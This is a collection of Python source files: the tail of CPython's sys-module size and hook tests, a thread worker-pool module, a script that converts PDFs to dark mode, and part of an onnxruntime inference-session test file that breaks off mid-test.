check(iter(bytearray()), size('nP')) # bytes check(b'', vsize('n') + 1) check(b'x' * 10, vsize('n') + 11) # cell def get_cell(): x = 42 def inner(): return x return inner check(get_cell().__closure__[0], size('P')) # code def check_code_size(a, expected_size): self.assertGreaterEqual(sys.getsizeof(a), expected_size) check_code_size(get_cell().__code__, size('6i13P')) check_code_size(get_cell.__code__, size('6i13P')) def get_cell2(x): def inner(): return x return inner check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n')) # complex check(complex(0,1), size('2d')) # method_descriptor (descriptor object) check(str.lower, size('3PPP')) # classmethod_descriptor (descriptor object) # XXX # member_descriptor (descriptor object) import datetime check(datetime.timedelta.days, size('3PP')) # getset_descriptor (descriptor object) import collections check(collections.defaultdict.default_factory, size('3PP')) # wrapper_descriptor (descriptor object) check(int.__add__, size('3P2P')) # method-wrapper (descriptor object) check({}.__iter__, size('2P')) # empty dict check({}, size('nQ2P')) # dict check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P')) longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8} check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P')) # dictionary-keyview check({}.keys(), size('P')) # dictionary-valueview check({}.values(), size('P')) # dictionary-itemview check({}.items(), size('P')) # dictionary iterator check(iter({}), size('P2nPn')) # dictionary-keyiterator check(iter({}.keys()), size('P2nPn')) # dictionary-valueiterator check(iter({}.values()), size('P2nPn')) # dictionary-itemiterator 
check(iter({}.items()), size('P2nPn')) # dictproxy class C(object): pass check(C.__dict__, size('P')) # BaseException check(BaseException(), size('5Pb')) # UnicodeEncodeError check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP')) # UnicodeDecodeError check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP')) # UnicodeTranslateError check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP')) # ellipses check(Ellipsis, size('')) # EncodingMap import codecs, encodings.iso8859_3 x = codecs.charmap_build(encodings.iso8859_3.decoding_table) check(x, size('32B2iB')) # enumerate check(enumerate([]), size('n3P')) # reverse check(reversed(''), size('nP')) # float check(float(0), size('d')) # sys.floatinfo check(sys.float_info, vsize('') + self.P * len(sys.float_info)) # frame import inspect x = inspect.currentframe() check(x, size('3Pi3c')) # function def func(): pass check(func, size('14Pi')) class c(): @staticmethod def foo(): pass @classmethod def bar(cls): pass # staticmethod check(foo, size('PP')) # classmethod check(bar, size('PP')) # generator def get_gen(): yield 1 check(get_gen(), size('P2PPP4P')) # iterator check(iter('abc'), size('lP')) # callable-iterator import re check(re.finditer('',''), size('2P')) # list samples = [[], [1,2,3], ['1', '2', '3']] for sample in samples: check(list(sample), vsize('Pn') + len(sample)*self.P) # sortwrapper (list) # XXX # cmpwrapper (list) # XXX # listiterator (list) check(iter([]), size('lP')) # listreverseiterator (list) check(reversed([]), size('nP')) # int check(0, vsize('')) check(1, vsize('') + self.longdigit) check(-1, vsize('') + self.longdigit) PyLong_BASE = 2**sys.int_info.bits_per_digit check(int(PyLong_BASE), vsize('') + 2*self.longdigit) check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit) check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit) # module check(unittest, size('PnPPP')) # None check(None, size('')) # NotImplementedType check(NotImplemented, size('')) # object check(object(), size('')) # property (descriptor object) class C(object): def getx(self): return self.__x def setx(self, value): self.__x = value def delx(self): del self.__x x = property(getx, setx, delx, "") check(x, size('5Pi')) # PyCapsule # XXX # rangeiterator check(iter(range(1)), size('4l')) # reverse check(reversed(''), size('nP')) # range check(range(1), size('4P')) check(range(66000), size('4P')) # set # frozenset PySet_MINSIZE = 8 samples = [[], range(10), range(50)] s = size('3nP' + PySet_MINSIZE*'nP' + '2nP') for sample in samples: minused = len(sample) if minused == 0: tmp = 1 # the computation of minused is actually a bit more complicated # but this suffices for the sizeof test minused = minused*2 newsize = PySet_MINSIZE while newsize <= minused: newsize = newsize << 1 if newsize <= 8: check(set(sample), s) check(frozenset(sample), s) else: check(set(sample), s + newsize*calcsize('nP')) check(frozenset(sample), s + newsize*calcsize('nP')) # setiterator check(iter(set()), size('P3n')) # slice check(slice(0), size('3P')) # super check(super(int), size('3P')) # tuple check((), vsize('')) check((1,2,3), vsize('') + 3*self.P) # type # static type: PyTypeObject fmt = 'P2nPI13Pl4Pn9Pn11PIPP' s = vsize(fmt) check(int, s) # class s = vsize(fmt + # PyTypeObject '4P' # PyAsyncMethods '36P' # PyNumberMethods '3P' # PyMappingMethods '10P' # PySequenceMethods '2P' # PyBufferProcs '5P') class newstyleclass(object): pass # Separate block for PyDictKeysObject with 8 keys and 5 entries check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 
5*calcsize("n2P")) # dict with shared keys check(newstyleclass().__dict__, size('nQ2P') + 5*self.P) o = newstyleclass() o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1 # Separate block for PyDictKeysObject with 16 keys and 10 entries check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P")) # dict with shared keys check(newstyleclass().__dict__, size('nQ2P') + 10*self.P) # unicode # each tuple contains a string and its expected character size # don't put any static strings here, as they may contain # wchar_t or UTF-8 representations samples = ['1'*100, '\xff'*50, '\u0100'*40, '\uffff'*100, '\U00010000'*30, '\U0010ffff'*100] asciifields = "nnbP" compactfields = asciifields + "nPn" unicodefields = compactfields + "P" for s in samples: maxchar = ord(max(s)) if maxchar < 128: L = size(asciifields) + len(s) + 1 elif maxchar < 256: L = size(compactfields) + len(s) + 1 elif maxchar < 65536: L = size(compactfields) + 2*(len(s) + 1) else: L = size(compactfields) + 4*(len(s) + 1) check(s, L) # verify that the UTF-8 size is accounted for s = chr(0x4000) # 4 bytes canonical representation check(s, size(compactfields) + 4) # compile() will trigger the generation of the UTF-8 # representation as a side effect compile(s, "<stdin>", "eval") check(s, size(compactfields) + 4 + 4) # TODO: add check that forces the presence of wchar_t representation # TODO: add check that forces layout of unicodefields # weakref import weakref check(weakref.ref(int), size('2Pn2P')) # weakproxy # XXX # weakcallableproxy check(weakref.proxy(int), size('2Pn2P')) def check_slots(self, obj, base, extra): expected = sys.getsizeof(base) + struct.calcsize(extra) if gc.is_tracked(obj) and not gc.is_tracked(base): expected += self.gc_headsize self.assertEqual(sys.getsizeof(obj), expected) def test_slots(self): # check all subclassable types defined in Objects/ that allow # non-empty __slots__ check = self.check_slots class BA(bytearray): __slots__ = 'a', 'b', 'c' check(BA(), bytearray(), '3P') class D(dict): __slots__ = 'a', 'b', 'c' check(D(x=[]), {'x': []}, '3P') class L(list): __slots__ = 'a', 'b', 'c' check(L(), [], '3P') class S(set): __slots__ = 'a', 'b', 'c' check(S(), set(), '3P') class FS(frozenset): __slots__ = 'a', 'b', 'c' check(FS(), frozenset(), '3P') from collections import OrderedDict class OD(OrderedDict): __slots__ = 'a', 'b', 'c' check(OD(x=[]), OrderedDict(x=[]), '3P') def test_pythontypes(self): # check all types defined in Python/ size = test.support.calcobjsize vsize = test.support.calcvobjsize check = self.check_sizeof # _ast.AST import _ast check(_ast.AST(), size('P')) try: raise TypeError except TypeError: tb = sys.exc_info()[2] # traceback if tb is not None: check(tb, size('2P2i')) # symtable entry # XXX # sys.flags check(sys.flags, vsize('') + self.P * len(sys.flags)) def test_asyncgen_hooks(self): old = sys.get_asyncgen_hooks() self.assertIsNone(old.firstiter) self.assertIsNone(old.finalizer) firstiter = lambda *a: None sys.set_asyncgen_hooks(firstiter=firstiter) hooks = sys.get_asyncgen_hooks() self.assertIs(hooks.firstiter, firstiter) self.assertIs(hooks[0], firstiter) self.assertIs(hooks.finalizer, None) self.assertIs(hooks[1], None) finalizer = lambda *a: None sys.set_asyncgen_hooks(finalizer=finalizer) hooks = sys.get_asyncgen_hooks() self.assertIs(hooks.firstiter, firstiter) self.assertIs(hooks[0], firstiter) self.assertIs(hooks.finalizer, finalizer) self.assertIs(hooks[1], finalizer) sys.set_asyncgen_hooks(*old) cur = sys.get_asyncgen_hooks() 
self.assertIsNone(cur.firstiter) self.assertIsNone(cur.finalizer) def test_changing_sys_stderr_and_removing_reference(self): # If the default displayhook doesn't take a strong reference # to sys.stderr the following code can crash. See bpo-43660 # for more details. code = textwrap.dedent(''' import sys class MyStderr: def write(self, s): sys.stderr = None sys.stderr = MyStderr() 1/0 ''') rc, out, err = assert_python_failure('-c', code) self.assertEqual(out, b"") self.assertEqual(err, b"") if __name__ == "__main__": unittest.main()
workerpool.py
"""Worker pool module.""" import logging from threading import Thread, Event import queue _LOGGER = logging.getLogger(__name__) class WorkerPool(object): """Worker pool class to implement single producer/multiple consumer.""" def __init__(self, worker_count, worker_func): """ Class constructor. :param worker_count: Number of workers for the pool. :type worker_func: Function to be executed by the workers whenever a messages is fetched. """ self._failed = False self._incoming = queue.Queue() self._should_be_working = [True for _ in range(0, worker_count)] self._worker_events = [Event() for _ in range(0, worker_count)] self._threads = [ Thread(target=self._wrapper, args=(i, worker_func), name="pool_worker_%d" % i) for i in range(0, worker_count) ] for thread in self._threads: thread.setDaemon(True) def start(self): """Start the workers.""" for thread in self._threads: thread.start() @staticmethod def _safe_run(func, message): """ Execute the user funcion for a given message without raising exceptions. :param func: User defined function. :type func: callable :param message: Message fetched from the queue. :param message: object :return True if no everything goes well. False otherwise. :rtype bool """ try: func(message) return True except Exception: # pylint: disable=broad-except _LOGGER.error("Something went wrong when processing message %s", message) _LOGGER.debug('Original traceback: ', exc_info=True) return False def _wrapper(self, worker_number, func): """ Fetch message, execute tasks, and acknowledge results. :param worker_number: # (id) of worker whose function will be executed. :type worker_number: int :param func: User defined function. :type func: callable. """ while self._should_be_working[worker_number]: try: message = self._incoming.get(True, 0.5) # For some reason message can be None in python2 implementation of queue. # This method must be both ignored and acknowledged with .task_done() # otherwise .join() will halt. if message is None: _LOGGER.debug('spurious message received. acking and ignoring.') self._incoming.task_done() continue # If the task is successfully executed, the ack is done AFTERWARDS, # to avoid race conditions on SDK initialization. _LOGGER.debug("processing message '%s'", message) ok = self._safe_run(func, message) # pylint: disable=invalid-name if not ok: self._failed = True _LOGGER.error( ("Something went wrong during the execution, " "removing message \"%s\" from queue."), message ) self._incoming.task_done() except queue.Empty: # No message was fetched, just keep waiting. pass # Set my flag indicating that i have finished self._worker_events[worker_number].set() def submit_work(self, message): """ Add a new message to the work-queue. :param message: New message to add. :type message: object. """ self._incoming.put(message) _LOGGER.debug('queued message %s for processing.', message) def wait_for_completion(self): """Block until the work queue is empty.""" _LOGGER.debug('waiting for all messages to be processed.') self._incoming.join() _LOGGER.debug('all messages processed.') old = self._failed self._failed = False return old def stop(self, event=None): """Stop all worker nodes.""" async_stop = Thread(target=self._wait_workers_shutdown, args=(event,)) async_stop.setDaemon(True) async_stop.start() def _wait_workers_shutdown(self, event): """ Wait until all workers have finished, and set the event. :param event: Event to set as soon as all the workers have shut down. 
        :type event: threading.Event
        """
        self.wait_for_completion()
        for index, _ in enumerate(self._should_be_working):
            self._should_be_working[index] = False

        if event is not None:
            for worker_event in self._worker_events:
                worker_event.wait()
            event.set()
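
# A minimal usage sketch for the WorkerPool above, assuming a hypothetical handler
# that just logs each message; it exercises start(), submit_work(),
# wait_for_completion() and stop().
if __name__ == '__main__':
    import time

    logging.basicConfig(level=logging.DEBUG)

    def _print_message(message):
        """Hypothetical worker function: pretend to process a message."""
        time.sleep(0.1)
        _LOGGER.info("handled %s", message)

    pool = WorkerPool(worker_count=4, worker_func=_print_message)
    pool.start()
    for task in range(10):
        pool.submit_work(task)

    failed = pool.wait_for_completion()  # blocks until the queue is drained
    _LOGGER.info("any task failed: %s", failed)

    stopped = Event()
    pool.stop(stopped)   # shuts the workers down asynchronously
    stopped.wait()       # the event is set once every worker thread has exited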
darkmode.py
# JustinTheWhale """ Program that converts all of the .pdf files in the same directory to have a "Dark mode" to put less strain on your eyes :-) Final file will be saved with the same name but with "_darkmode.pdf" at the end Things to note: Might take a while depending on how large your .pdf(s) is/are The final file is much larger than the original file """ import multiprocessing as mp import os import sys from threading import Thread import cv2 import numpy as np from fpdf import FPDF from numba import jit, uint8 from pdf2image import convert_from_path from PIL import Image from PyPDF2 import PdfFileMerger class Darkmode: """ Attributes ---------- threads : int An integer representing the available cpu threads. More than 16 caused strange issues on Windows. pdfs : list[str] A list of string(s) of pdf files to process. pngs : list[str] A list of string(s) of png files to process. temp_pdfs : list[str] A list of string(s) of temp_pdf files to process. pdf_groups : dict{str : [str]} A dict conatining the base filename for a pdf and a list of its converted pages. batches : list[list] A list of lists to distribute the processing evenly on the CPU. Methods ------- pdf_to_png(dpi_count=300): Iterates through each pdf file in self.pdfs and separates indiviual pages into separate png files. The names of the png files are saved in self.pngs. make_batches(task_list): Makes a list of lists where len(list) does not exceed cpu count. If a large PDF is encountered, each page will be converted by its own process. Starting more processes than cpu count might lead to performance regression. make_processes(): Adds process objects to self.process_list. start_processes(): Starts indiviual process objects in self.process_list. make_threads(): Adds thread objects to self.thread_list. start_threads(): Starts indiviual thread objects in self.thread_list. def speed(image): Uses numba to quickly parse image array and change pixels to grey. black_to_grey(file): Takes inverted .png image and converts all black pixels to grey. png_to_pdf(png): Converts darkmode .png files to .pdf files. Adds temp filename to self.temp_pdfs after. get_groups(): Goes through temp pdf files to group PDF pages by filename. Changes value of self.pdfs. repack(self): Packs all converted pdf files into a single PDF. Uses self.temp_pdfs for processing. """ def __init__(self, pdfs=None): self.threads = mp.cpu_count() if self.threads > 16: self.threads = 16 self.pdfs = [] self.pngs = [] self.temp_pdfs = [] self.pdf_groups = {} self.process_list = [] self.thread_list = [] self.batches = [] def pdf_to_png(self, dpi_count=300): """ Iterates through each pdf file in self.pdfs and separates indiviual pages into separate png files. The names of the png files are saved in self.pngs. Arguments: dpi_count (Optional)) : int that specifies dpi when processing. Higher dpi scales with longer processing and higher quality. """ for file in self.pdfs: pages = convert_from_path( file, dpi=dpi_count, thread_count=self.threads, grayscale=True ) new_name = file[:-4] for page in pages: name = f"{new_name}-page{str(pages.index(page)).zfill(4)}.png" self.pngs.append(name) page.save(name, "PNG", compress_level=1) inverted = np.where(cv2.imread(name) <= 140, 255, 0) cv2.imwrite(name, inverted) def make_batches(self, task_list): """ Makes a list of lists where len(list) does not exceed cpu count. If a large PDF is encountered, each page will be converted by its own process. Starting more processes than cpu count might lead to performance regression. 
Arguments: task_list (list): List of threads/processes. cpus (int): How long each sublist will be. Returns: batches (list) : List of lists where each sub-list is <= cpus. """ if len(task_list) <= self.threads: return [task_list] else: batches = [ task_list[i : i + self.threads] for i in range(len(task_list), self.threads) ] return batches def make_processes(self): """ Adds process objects to self.process_list. """ for file in self.pngs: p = mp.Process(target=self.black_to_grey, args=(file,)) self.process_list.append(p) def start_processes(self): """ Starts indiviual process objects in self.process_list. """ self.process_list = self.make_batches(self.process_list) for i in range(len(self.process_list)): for p in self.process_list[i]: p.start() for p in self.process_list[i]: p.join() def make_threads(self): """ Adds thread objects to self.thread_list. """ for file in self.pngs: t = Thread(target=self.png_to_pdf, args=(file,)) self.thread_list.append(t) def start_threads(self): """ Starts indiviual thread objects in self.thread_list. """ self.thread_list = self.make_batches(self.thread_list) for i in range(len(self.thread_list)): for t in self.thread_list[i]: t.start() for t in self.thread_list[i]: t.join() @staticmethod @jit(nopython=True, cache=True, fastmath={"fast"}) def speed(image): """ Uses numba to quickly parse image array and change pixels to grey. Arguments: image (numpy.array) : Image in contained within a numpy array. Returns: image (numpy.array) : Converted numpy.image array """ grey = np.full((3), fill_value=70, dtype=np.uint8) for i in range(len(image)): for j in range(len(image[0])): if np.sum(image[i, j]) == 0: image[i, j] = grey return image def black_to_grey(self, file): """ Takes inverted .png image and converts all black pixels to grey. Arguments: file (str) : String representing string filename. """ color_array = cv2.imread(file) color_array = self.speed(color_array) cv2.imwrite(file, color_array) def png_to_pdf(self, png): """ Converts darkmode .png files to .pdf files. Adds temp filename to self.temp_pdfs after. Arguments: png (str): String representing string filename. """ pdf = FPDF() pdf.add_page() pdf.image(png, 0, 0, 210, 300) name = png.replace(".png", "_temp_darkmode.pdf") pdf.output(name, "F") pdf.close() self.temp_pdfs.append(name) os.remove(png) def get_groups(self): """ Goes through temp pdf files to group PDF pages by filename. Changes value of self.pdfs. """ pdfs = {} for file in sorted(self.temp_pdfs): if file.endswith(".pdf") and "darkmode" in file: pdf_file = file.split("-")[0] if pdf_file in pdfs: pdfs[pdf_file].append(file) else: pdfs[pdf_file] = [file] self.temp_pdfs = pdfs def repack(self): """ Packs all converted pdf files into a single PDF. Uses self.temp_pdfs for processing. """ pdfs = list(self.temp_pdfs.keys()) for pdf in pdfs: merger = PdfFileMerger() for file in self.temp_pdfs[pdf]: merger.append(file) name = f"{pdf}_converted.pdf" merger.write(name) merger.close() def main(files=None): """ Main function, creates object and calls class methods. Arguments: files (Optional) : str or list of files to convert. 
""" darkmode_generator = Darkmode() if files is not None: if isinstance(files, list) and files != []: for file in files: if not os.path.exists(file): print(f"Can't find {file} with the given path, exiting!") return else: darkmode_generator.pdfs.append(file) elif isinstance(files, str): if os.path.exists(files): darkmode_generator.pdfs = [files] else: print(f"Can't find {files} with the given path, exiting!") return else: print("Invalid file type detected, exiting!") return else: # This does all darkmode_generator.pdfs = [] for file in os.listdir("."): if file.endswith(".pdf") and "_converted" not in file: darkmode_generator.pdfs.append(file) darkmode_generator.pdf_to_png() darkmode_generator.make_processes() darkmode_generator.start_processes() darkmode_generator.make_threads() darkmode_generator.start_threads() darkmode_generator.pdf_groups = darkmode_generator.get_groups() darkmode_generator.repack() for item in darkmode_generator.temp_pdfs.values(): for i in item: os.remove(i) def convert(files=None): """ Calls the main function, This is what should be called when using package. Arguments: files (Optional) : str or list of files to convert. """ main(files=files) if __name__ == "__main__": n = len(sys.argv) if n == 1: convert() elif n == 2: if "pdf" in sys.argv[1]: convert(files=sys.argv[1]) else: files = sys.argv files.pop(0) for i in range(len(files)): if "pdf" in files[i]: pass else: files.pop(i) if files != []: convert(files=files)
onnxruntime_test_python.py
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. # -*- coding: UTF-8 -*- import unittest import os import numpy as np import onnxruntime as onnxrt import threading class TestInferenceSession(unittest.TestCase): def get_name(self, name): if os.path.exists(name): return name rel = os.path.join("testdata", name) if os.path.exists(rel): return rel this = os.path.dirname(__file__) data = os.path.join(this, "..", "testdata") res = os.path.join(data, name) if os.path.exists(res): return res raise FileNotFoundError("Unable to find '{0}' or '{1}' or '{2}'".format(name, rel, res)) def run_model(self, session_object, run_options): x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = session_object.get_inputs()[0].name res = session_object.run([], {input_name: x}, run_options=run_options) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testModelSerialization(self): so = onnxrt.SessionOptions() so.log_verbosity_level = 1 so.logid = "TestModelSerialization" so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx" onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) self.assertTrue(os.path.isfile(so.optimized_model_filepath)) def testGetProviders(self): self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers()) self.assertTrue('CPUExecutionProvider' in onnxrt.get_all_providers()) sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) self.assertTrue('CPUExecutionProvider' in sess.get_providers()) def testSetProviders(self): if 'CUDAExecutionProvider' in onnxrt.get_available_providers(): sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) # confirm that CUDA Provider is in list of registered providers. self.assertTrue('CUDAExecutionProvider' in sess.get_providers()) # reset the session and register only CPU Provider. sess.set_providers(['CPUExecutionProvider']) # confirm only CPU Provider is registered now. self.assertEqual(['CPUExecutionProvider'], sess.get_providers()) def testInvalidSetProviders(self): with self.assertRaises(ValueError) as context: sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) sess.set_providers(['InvalidProvider']) self.assertTrue( '[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception)) def testSessionProviders(self): if 'CUDAExecutionProvider' in onnxrt.get_available_providers(): # create session from scratch, but constrain it to only use the CPU. 
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), providers=['CPUExecutionProvider']) self.assertEqual(['CPUExecutionProvider'], sess.get_providers()) def testRunModel(self): sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 2]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModelFromBytes(self): with open(self.get_name("mul_1.onnx"), "rb") as f: content = f.read() sess = onnxrt.InferenceSession(content) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 2]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModel2(self): sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx")) x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32) input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 1]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) def testRunModel2Contiguous(self): sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx")) x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]] input_name = sess.get_inputs()[0].name self.assertEqual(input_name, "X") input_shape = sess.get_inputs()[0].shape self.assertEqual(input_shape, [3, 2]) output_name = sess.get_outputs()[0].name self.assertEqual(output_name, "Y") output_shape = sess.get_outputs()[0].shape self.assertEqual(output_shape, [3, 1]) res = sess.run([output_name], {input_name: x}) output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32) np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08) xcontiguous = np.ascontiguousarray(x) rescontiguous = sess.run([output_name], {input_name: xcontiguous}) np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08) def testRunModelMultipleThreads(self): so = onnxrt.SessionOptions() so.log_verbosity_level = 1 so.logid = "MultiThreadsTest" sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so) ro1 = onnxrt.RunOptions() ro1.logid = "thread1" t1 = threading.Thread(target=self.run_model, args=(sess, ro1)) ro2 = onnxrt.RunOptions() ro2.logid = "thread2" t2 = threading.Thread(target=self.run_model, args=(sess, ro2)) t1.start() t2.start() t1.join() 
    t2.join()

    def testListAsInput(self):
        sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
        x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
        input_name = sess.get_inputs()[0].name
        res = sess.run([], {input_name: x.tolist()})
        output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
        np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)

    def testStringListAsInput(self):
        sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
        x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
        x_name = sess.get_inputs()[0].name
        res = sess.run([], {x_name: x.tolist()})
        np.testing.assert_equal(x, res[0])

    def testRunDevice(self):
        device = onnxrt.get_device()
        self.assertTrue('CPU' in device or 'GPU' in device)

    def testRunModelSymbolicInput(self):
        sess = onnxrt.InferenceSession(self.get_name("matmul_2.onnx"))
        x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
        input_name = sess.get_inputs()[0].name
        self.assertEqual(input_name, "X")
        input_shape = sess.get_inputs()[0].shape
        # Input X has an unknown dimension.
        self.assertEqual(input_shape, ['None', 2])
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "Y")
        output_shape = sess.get_outputs()[0].shape
        # Output Y has an unknown dimension.
        self.assertEqual(output_shape, ['None', 1])
        res = sess.run([output_name], {input_name: x})
        output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
        np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)

    def testBooleanInputs(self):
        sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"))
        a = np.array([[True, True], [False, False]], dtype=np.bool)
        b = np.array([[True, False], [True, False]], dtype=np.bool)
        # input1:0 is first in the protobuf, and input:0 is second,
        # and we maintain the original order.
        a_name = sess.get_inputs()[0].name
        self.assertEqual(a_name, "input1:0")
        a_shape = sess.get_inputs()[0].shape
        self.assertEqual(a_shape, [2, 2])
        a_type = sess.get_inputs()[0].type
        self.assertEqual(a_type, 'tensor(bool)')
        b_name = sess.get_inputs()[1].name
        self.assertEqual(b_name, "input:0")
        b_shape = sess.get_inputs()[1].shape
        self.assertEqual(b_shape, [2, 2])
        b_type = sess.get_inputs()[1].type
        self.assertEqual(b_type, 'tensor(bool)')
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "output:0")
        output_shape = sess.get_outputs()[0].shape
        self.assertEqual(output_shape, [2, 2])
        output_type = sess.get_outputs()[0].type
        self.assertEqual(output_type, 'tensor(bool)')
        output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
        res = sess.run([output_name], {a_name: a, b_name: b})
        np.testing.assert_equal(output_expected, res[0])

    def testStringInput1(self):
        sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
        x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
        x_name = sess.get_inputs()[0].name
        self.assertEqual(x_name, "input:0")
        x_shape = sess.get_inputs()[0].shape
        self.assertEqual(x_shape, [2, 2])
        x_type = sess.get_inputs()[0].type
        self.assertEqual(x_type, 'tensor(string)')
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "output:0")
        output_shape = sess.get_outputs()[0].shape
        self.assertEqual(output_shape, [2, 2])
        output_type = sess.get_outputs()[0].type
        self.assertEqual(output_type, 'tensor(string)')
        res = sess.run([output_name], {x_name: x})
        np.testing.assert_equal(x, res[0])

    def testStringInput2(self):
        sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
        x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
        x_name = sess.get_inputs()[0].name
        self.assertEqual(x_name, "input:0")
        x_shape = sess.get_inputs()[0].shape
        self.assertEqual(x_shape, [2, 2])
        x_type = sess.get_inputs()[0].type
        self.assertEqual(x_type, 'tensor(string)')
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "output:0")
        output_shape = sess.get_outputs()[0].shape
        self.assertEqual(output_shape, [2, 2])
        output_type = sess.get_outputs()[0].type
        self.assertEqual(output_type, 'tensor(string)')
        res = sess.run([output_name], {x_name: x})
        np.testing.assert_equal(x, res[0])

    def testInputBytes(self):
        sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
        x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
        x_name = sess.get_inputs()[0].name
        self.assertEqual(x_name, "input:0")
        x_shape = sess.get_inputs()[0].shape
        self.assertEqual(x_shape, [2, 2])
        x_type = sess.get_inputs()[0].type
        self.assertEqual(x_type, 'tensor(string)')
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "output:0")
        output_shape = sess.get_outputs()[0].shape
        self.assertEqual(output_shape, [2, 2])
        output_type = sess.get_outputs()[0].type
        self.assertEqual(output_type, 'tensor(string)')
        res = sess.run([output_name], {x_name: x})
        np.testing.assert_equal(x, res[0].astype('|S8'))

    def testInputObject(self):
        sess = onnxrt.InferenceSession(self.get_name("identity_string.onnx"))
        x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
        x_name = sess.get_inputs()[0].name
        self.assertEqual(x_name, "input:0")
        x_shape = sess.get_inputs()[0].shape
        self.assertEqual(x_shape, [2, 2])
        x_type = sess.get_inputs()[0].type
        self.assertEqual(x_type, 'tensor(string)')
        output_name = sess.get_outputs()[0].name
        self.assertEqual(output_name, "output:0")
        output_shape =
